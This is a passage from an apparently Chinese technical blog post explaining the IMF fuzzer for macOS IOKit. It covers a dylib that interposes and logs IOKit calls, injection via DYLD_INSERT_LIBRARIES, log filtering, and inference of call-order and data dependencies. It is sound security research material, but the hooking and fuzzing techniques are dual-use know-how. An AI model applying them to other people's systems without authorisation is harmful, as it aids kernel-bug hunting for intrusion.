class="built_in">fprintf</span>(fp,<span class="string">&quot;IN [&#x27;IOCatalogueReset&#x27;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,masterPort, <span class="built_in">sizeof</span>(<span class="type">mach_port_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,masterPort,<span class="built_in">sizeof</span>(<span class="type">mach_port_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;flag&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,flag, <span class="built_in">sizeof</span>(<span class="type">uint32_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;flag&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,flag,<span class="built_in">sizeof</span>(<span class="type">uint32_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">  <span class="type">kern_return_t</span> ret = <span class="built_in">IOCatalogueReset</span>(masterPort,flag);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;OUT [&#x27;IOCatalogueReset&#x27;,&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="number">1</span>) <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x%x,&#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:0x%x, &#x27;data&#x27;:[&quot;</span>,ret, <span class="built_in">sizeof</span>(<span class="type">kern_return_t</span>),<span class="number">1</span>);</span><br><span class="line">  <span class="keyword">else</span> <span class="built_in">fprintf</span>(fp,<span class="string">&quot;&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x%x, &#x27;size&#x27; : 0x%lx,&#x27;cnt&#x27;:&#x27;undefined&#x27;, &#x27;data&#x27;:[&quot;</span>,ret,<span class="built_in">sizeof</span>(<span class="type">kern_return_t</span>));</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]&#125;,&quot;</span>);</span><br><span class="line">  <span class="built_in">fprintf</span>(fp,<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">  <span class="built_in">fclose</span>(fp);</span><br><span class="line">  <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">interposer</span> &#123;</span><br><span class="line">    <span class="type">void</span>* replacement;</span><br><span class="line">    <span class="type">void</span>* original;</span><br><span class="line">&#125; <span class="type">interpose_t</span>;</span><br><span class="line">__attribute__((used)) <span class="type">static</span> <span class="type">const</span> <span class="type">interpose_t</span> interposers[]</span><br><span class="line">  __attribute__((<span class="built_in">section</span>(<span class="string">&quot;__DATA, __interpose&quot;</span>))) = &#123;</span><br><span class="line">    &#123; </span><br><span class="line">        .replacement = (<span class="type">void</span>*) fake_IOCatalogueReset, </span><br><span class="line">        .original    = (<span class="type">void</span>*) IOCatalogueReset</span><br><span class="line">    &#125;,</span><br><span class="line">    [...]</span><br><span class="line">  &#125;;</span><br></pre></td></tr></table></figure><p><a href="http://hook.py">hook.py</a> 将会批量生成 <code>fake_IOXXXX</code> 函数，并填充相应的数据结构至 interposers 数组中。</p><p>当 <code>hook.py hook.c</code> 命令执行完毕，生成出 hook.c 文件后， 执行以下代码将生成待注入的 dylib：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clang  -Wall -dynamiclib -framework IOKit -framework CoreFoundation -<span class="built_in">arch</span> x86_64 hook.c -o hook.dylib</span><br></pre></td></tr></table></figure><p>之后执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DYLD_INSERT_LIBRARIES=<span class="variable">$&#123;PWD&#125;</span>/hook.dylib [program path] [program args]</span><br></pre></td></tr></table></figure><p>这样，目标程序在使用 IOKit lib 时，对应的 IOKit 函数将会被所注入的动态链接库 hook.dylib 动态 hook，并在 /tmp/log 中记录下日志：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># kern_return_t IORegistryEntryGetLocationInPlane(</span></span><br><span class="line"><span class="comment"># io_registry_entry_t entry,</span></span><br><span class="line"><span class="comment">#   const io_name_t   plane,</span></span><br><span class="line"><span class="comment"># io_name_t           location );</span></span><br><span class="line"></span><br><span class="line">IN </span><br><span class="line">[</span><br><span class="line">  <span class="string">&#x27;IORegistryEntryGetLocationInPlane&#x27;</span>,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;entry&#x27;</span>,   <span class="comment"># 参数1 变量名</span></span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="number">0x2607</span>,  <span class="comment"># 参数1 调用时传入的值</span></span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x4</span>,     <span class="comment"># 参数1 所占用的内存大小，即 sizeof(type)</span></span><br><span class="line">        <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>,    <span class="comment"># 参数1 若是指针，则指针所指向的值的个数</span></span><br><span class="line">        <span class="string">&#x27;ori&#x27;</span>:<span class="string">&#x27;IOServiceGetMatchingService(</span></span><br><span class="line"><span class="string">          0,IOServiceMatching(</span></span><br><span class="line"><span class="string">            &quot;IOUserServer(com.apple.driverkit.AppleUserHIDDrivers-0x100000419)&quot;))&#x27;</span>, </span><br><span class="line">        <span class="string">&#x27;data&#x27;</span>:[]     <span class="comment"># 参数1 若是指针，则指针所指向的数组的所有值</span></span><br><span class="line">  &#125;,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;plane&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="string">&#x27;&quot;IOService&quot;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x80</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;location&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="string">&#x27;&quot;x&amp;&quot;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x80</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">OUT </span><br><span class="line">[</span><br><span class="line">  <span class="string">&#x27;IORegistryEntryGetLocationInPlane&#x27;</span>,</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;ret&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="number">0xe00002f0</span>,</span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x4</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>需要注意的是，对于每一个 IOKit 函数调用，API Hook 都会生成2个条目：</p><ul><li>一个是 <strong>IN 条目</strong>，用于记录传入的参数信息</li><li>另一个是 <strong>OUT 条目</strong>，用于记录函数调用所返回的信息</li></ul><h3 id="2-Inferrer">2. Inferrer</h3><h4 id="a-Log-Filtering">a. Log Filtering</h4><h5 id="1-论文细节">1) 论文细节</h5><p>由于每次执行目标程序时，不同的环境下会产生不同的日志，因此 IMF 将会对生成的日志进行进一步的过滤与处理。</p><p>这里 Log Filtering 的目的是：从给定的日志集中<strong>选取N个具有最长公共前缀的日志</strong>，并收集这 N 个日志中的<strong>公共前缀</strong>，以<strong>构造出一组具有完全相同的顺序和相同数量的 API 调用序列 S</strong>。</p><p>由于调用序列 S 中在不同环境下所记录的 log 不同，一些参数会有着不同的参数值，因此这种不确定性可以用于更好的确定 API 模型。</p><h5 id="2-技术细节">2) 技术细节</h5><p>Filtering 的操作位于 <a href="http://filter.py">filter.py</a> 中。</p><ul><li><p>初始时，filter 会循环读入每个日志文件，并对每个日志文件中的每个 IN/OUT log 进行哈希。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">loader</span>(<span class="params">path</span>):</span><br><span class="line">    ret = []</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read().split(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>]</span><br><span class="line">    idx = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> idx &lt; <span class="built_in">len</span>(data):</span><br><span class="line">        name = parse_name(data[idx])</span><br><span class="line">        selector = parse_selector(data[idx])</span><br><span class="line">        hval = merge(name, selector)</span><br><span class="line">        ret.append(hval)</span><br><span class="line">        idx += <span class="number">2</span></span><br><span class="line">    <span class="keyword">return</span> path, ret</span><br></pre></td></tr></table></figure><p>这里对 log 条目进行哈希时，使用的是<strong>函数名 + selector</strong> 作为输入源(merge 操作)。其中，selector 只有在函数名为 <code>IOConnectCallXXXXMethod</code> 时才有用到。也就是说，这里的哈希将会对<strong>相同的函数名 CallMethod 但不同的 selector 选择子</strong>区分开来。</p><p>哈希后的结果是<strong>一个数组</strong>，数组中有<strong>多个元组</strong>，每个元组里分别有两个成员，分别是单个 log 文件名，与一个存放着该 log 文件中每个条目哈希的数组：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">[</span></span><br><span class="line">    &#x27;log1.txt&#x27;<span class="punctuation">,</span> <span class="punctuation">[</span></span><br><span class="line">        entry1_hash<span class="punctuation">,</span></span><br><span class="line">        entry2_hash<span class="punctuation">,</span></span><br><span class="line">        ....</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    ....</span><br><span class="line"><span class="punctuation">]</span></span><br></pre></td></tr></table></figure></li><li><p>上面步骤所输出的内容，称为一个 <strong>group</strong>。接下来 filter 将会执行 categorize 函数，遍历 groups 中某个 index 所对应的 log entry hash。这样做的目的是为了进行<strong>最长公共子序列</strong>筛选。</p><p>每次筛选后，相同 idx 但不同的 hash 的 log entry 将会被单独拆开并合并至新的 group 中。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">categorize</span>(<span class="params">groups, idx</span>):</span><br><span class="line">    ret = []</span><br><span class="line">    <span class="keyword">for</span> group <span class="keyword">in</span> groups:</span><br><span class="line">        tmp = &#123;&#125;</span><br><span class="line">        <span class="keyword">for</span> fn, hvals <span class="keyword">in</span> group:</span><br><span class="line">            hval = get(hvals, idx)</span><br><span class="line">            <span class="keyword">if</span> hval <span class="keyword">not</span> <span class="keyword">in</span> tmp:</span><br><span class="line">                tmp[hval] = []</span><br><span class="line">            tmp[hval].append((fn, hvals))</span><br><span class="line">        <span class="keyword">for</span> hval <span class="keyword">in</span> tmp:</span><br><span class="line">            <span class="keyword">if</span> hval != <span class="literal">None</span> :</span><br><span class="line">                ret.append(tmp[hval])</span><br><span class="line">    <span class="keyword">return</span> ret</span><br></pre></td></tr></table></figure></li><li><p>每次筛选并合并成新的 groups 后，都会尝试执行一次 pick_best 的操作，遍历每个 groups 中的 group，并获取数量大于等于 N 的 group 中的 log entry。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">find_best</span>(<span class="params">groups, n</span>):</span><br><span class="line">    before = <span class="literal">None</span></span><br><span class="line">    idx = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(groups) != <span class="number">0</span>:</span><br><span class="line">        before = groups</span><br><span class="line">        groups = categorize(groups, idx)</span><br><span class="line">        <span class="keyword">if</span> pick_best(groups, n) == <span class="literal">None</span>:</span><br><span class="line">            <span class="keyword">return</span> pick_best(before, n), idx</span><br><span class="line">        idx += <span class="number">1</span></span><br><span class="line">    utils.error(<span class="string">&#x27;find_best error&#x27;</span>)</span><br></pre></td></tr></table></figure><p>如果可以获取，则说明筛选还没有详尽，因此 idx++，继续筛选；若无法获取，则回退返回上一次筛选的内容，并从中选择 log entry 大于等于 N 的 group，同时指定当前所分析到的 idx 长度。（注意单个 group 中会有多个 log 文件）</p></li><li><p>这样，根据上面的步骤，filter 便可以筛选并继续保存<strong>序列长度为 idx（注意这 idx 个长度的序列为公共子序列）</strong> 的多个 log 文件。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">save_best</span>(<span class="params">path, best_group, idx</span>):</span><br><span class="line">    <span class="keyword">for</span> fn, _ <span class="keyword">in</span> best_group:</span><br><span class="line">        name = fn.split(<span class="string">&#x27;/&#x27;</span>)[-<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(fn, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            data = f.read().split(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(path, name), <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            <span class="keyword">for</span> x <span class="keyword">in</span> data[:idx*<span class="number">2</span>]:</span><br><span class="line">                f.write(x+<span class="string">&#x27;\n&#x27;</span>)</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-API-Model-Inference">b. API Model Inference</h4><h5 id="1-论文细节-2">1) 论文细节</h5><p>论文中对于 API 的<strong>顺序依赖</strong>并没有进行特殊的处理，乐观的认为 API 函数之间的调用关系，应该会遵循筛选后的调用序列 S 中的某个相同序列。</p><p>而对于 API 的数据依赖，论文中将数据依赖的检测方式分为两步：</p><ol><li>识别出所有的常量</li><li>识别出一对函数之间的数据流关系</li></ol><p>首先是<strong>常量识别</strong>。对于调用序列的某个函数调用，其<strong>常量参数</strong>在其他调用序列（即过滤出的 N 个调用序列）中也一定是相同的。例如下面这个例子，</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 序列1</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment">/* 第i个调用 */</span> <span class="built_in">A</span>(变量<span class="number">1</span>, <span class="number">12</span>);</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"><span class="comment">// 序列2</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment">/* 第i个调用 */</span> <span class="built_in">A</span>(变量<span class="number">2</span>, <span class="number">12</span>);</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure><p>可以看到，对于不同序列中的第 i 个调用，其参数2的值相同，始终为 12，因此可以认为函数 A 的参数2 是一个常量值。</p><p>即，假设 $S^k_{i, j}$为<strong>第$k$个调用序列</strong>中的<strong>第$j$个函数调用</strong>里<strong>第$i$个参数</strong>，若满足 $S^1_{i, j}=S^2_{i, j}=…=S^N_{i, j}$，则说明 $S_{i,j}$ 是一个<strong>常量参数</strong>。</p><p>需要注意的是，在进行常量识别时，<strong>需要忽视掉句柄类型</strong>。因为对于这种类型的变量来说，即便值相同，但它们依然不是常量。</p><p>接下来是<strong>数据流识别</strong>。<strong>IMF 并没有识别参数与参数之间的数据流传递关系</strong>（和 syzkaller 不同），它只是简单的识别函数之间那种 <strong>函数1返回值 -&gt; 函数2参数值</strong> 的数据流关系：</p><ul><li>对于某个指定函数调用点的<strong>输入参数值</strong>，若该调用点前有<strong>任何一个函数的返回值</strong>与输入参数值相同，则说明这之中存在数据流依赖关系。</li><li>如果有多个函数的返回值与输入参数值相同，则始终选择最近的那个函数。</li></ul><p>需要注意的是，为了提高精度，IMF 会取<strong>每个调用序列</strong>中<strong>每个函数</strong>的数据流依赖<strong>交集</strong>。</p><p>而 inferrer 的最终输出是一个 C 语言的代码片段，即 AST 格式。其中，inferrrer 会根据顺序依赖来生成一系列的函数调用语句。对于每个函数调用，其函数参数将会根据类型来进行不同的填充：</p><ul><li>常量参数：使用调用序列里的常量值</li><li>非常量参数<ul><li>若与其他函数存在数据依赖，则声明一个变量，将输入参数与存在数据依赖的函数相连接</li><li>若不存在数据依赖，则随机选择一个该输入参数在日志中出现的值</li></ul></li></ul><h5 id="2-技术细节-2">2) 技术细节</h5><p>执行 inferrer 时，初始时，程序会先实例化 ApiFuzz 类，在该类的构造函数中执行 const.load_apis 函数，将先前准备好的 <strong>IOKit API 函数原型定义</strong> 读入内存，并以 <strong>Api 类</strong>的结构保存。单个 Api 类的结构如下所示：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">以该例子为例</span></span><br><span class="line"><span class="comment">[(&#x27;kern_return_t&#x27;, &#x27;IOMasterPort&#x27;), </span></span><br><span class="line"><span class="comment">[(&#x27;mach_port_t&#x27;, &#x27;bootstrapPort&#x27;, &#123;&#125;), (&#x27;mach_port_t *&#x27;, &#x27;masterPort&#x27;, &#123;&#x27;IO&#x27;: &#x27;O&#x27;&#125;)]]</span></span><br><span class="line"><span class="comment">*/</span> </span><br><span class="line">IOMasterPort_Api_class = <span class="punctuation">&#123;</span></span><br><span class="line">    rtype<span class="punctuation">:</span>&#x27;kern_return_t&#x27;<span class="punctuation">,</span></span><br><span class="line">    rval<span class="punctuation">:</span> Arg_class <span class="punctuation">&#123;</span></span><br><span class="line">    type<span class="punctuation">:</span> &#x27;kern_return_t&#x27;<span class="punctuation">,</span></span><br><span class="line">      name<span class="punctuation">:</span> &#x27;ret&#x27;<span class="punctuation">,</span></span><br><span class="line">      opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    name<span class="punctuation">:</span>&#x27;IOMasterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">    args <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        Arg <span class="punctuation">&#123;</span></span><br><span class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;bootstrapPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    Arg <span class="punctuation">&#123;</span></span><br><span class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t *&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;masterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;IO&#x27;<span class="punctuation">:</span> &#x27;O&#x27;<span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>之后，程序会在 ApiFuzz 类的 make_model 成员函数中，以多进程方式执行 load_apilog 成员，将先前 hook 生成的 API log 读入内存。</p><p>注意到 API log 中每两个条目（即一对 IN/OUT 条目）对应的是一个 IOKit 函数调用的参数输入与函数返回，因此在 load_apilog 函数中，程序同样会以一对条目为单位读入 ApiLog 类中。每一个 ApiLog 的结构如下所示：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">  io_registry_entry_t IORegistryGetRootEntry (mach_port_t masterPort)</span></span><br><span class="line"><span class="comment">  IN [&#x27;IORegistryGetRootEntry&#x27;,&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x0,&#x27;size&#x27; : 0x4,&#x27;cnt&#x27;:0x1, &#x27;data&#x27;:[]&#125;,]</span></span><br><span class="line"><span class="comment">  OUT [&#x27;IORegistryGetRootEntry&#x27;,&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x2903,&#x27;size&#x27; : 0x4,&#x27;cnt&#x27;:0x1, &#x27;data&#x27;:[]&#125;,]</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">ApiLog(派生自API) = <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="comment">// 以下四个是 API 类中的字段</span></span><br><span class="line">    args<span class="punctuation">:</span>   xxxxx<span class="punctuation">,</span></span><br><span class="line">    name<span class="punctuation">:</span>  &#x27;IORegistryGetRootEntry&#x27;<span class="punctuation">,</span></span><br><span class="line">    rtype<span class="punctuation">:</span>  xxxxx<span class="punctuation">,</span></span><br><span class="line">    rval<span class="punctuation">:</span>  xxxxx<span class="punctuation">,</span></span><br><span class="line">    </span><br><span class="line">    api <span class="punctuation">:</span>   Api(IORegistryGetRootEntry)<span class="punctuation">,</span></span><br><span class="line">    args_dict<span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        &#x27;masterPort&#x27;<span class="punctuation">:</span> Arg(IORegistryGetRootEntry_arg0)</span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    hval<span class="punctuation">:</span> None<span class="punctuation">,</span></span><br><span class="line">    il<span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        &#x27;masterPort&#x27;<span class="punctuation">:</span> ArgLog(派生自 Arg) <span class="punctuation">&#123;</span></span><br><span class="line">      <span class="comment">// 以下三个是 Arg 类的字段</span></span><br><span class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;masterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span>，</span><br><span class="line"></span><br><span class="line">      arg<span class="punctuation">:</span> Arg(内部内容和上面三个字段一样)<span class="punctuation">,</span></span><br><span class="line">      log<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;name&#x27;<span class="punctuation">:</span>&#x27;masterPort&#x27;<span class="punctuation">,</span>&#x27;value&#x27;<span class="punctuation">:</span> <span class="number">0x0</span><span class="punctuation">,</span>&#x27;size&#x27; <span class="punctuation">:</span> <span class="number">0x4</span><span class="punctuation">,</span>&#x27;cnt&#x27;<span class="punctuation">:</span><span class="number">0x1</span><span class="punctuation">,</span> &#x27;data&#x27;<span class="punctuation">:</span><span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">&#125;</span></span><br><span class="line">      is_input <span class="punctuation">:</span> True<span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    ol<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    rval_log<span class="punctuation">:</span> ArgLog <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="comment">// 以下三个是 Arg 类的字段</span></span><br><span class="line">        type<span class="punctuation">:</span> &#x27;io_registry_entry_t&#x27;<span class="punctuation">,</span></span><br><span class="line">        name<span class="punctuation">:</span> &#x27;ret&#x27;<span class="punctuation">,</span></span><br><span class="line">        opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span>，</span><br><span class="line"></span><br><span class="line">        arg<span class="punctuation">:</span> Arg(内部内容和上面三个字段一样)<span class="punctuation">,</span></span><br><span class="line">      log<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;name&#x27;<span class="punctuation">:</span>&#x27;ret&#x27;<span class="punctuation">,</span>&#x27;value&#x27;<span class="punctuation">:</span> <span class="number">0x2903</span><span class="punctuation">,</span>&#x27;size&#x27; <span class="punctuation">:</span> <span class="number">0x4</span><span class="punctuation">,</span>&#x27;cnt&#x27;<span 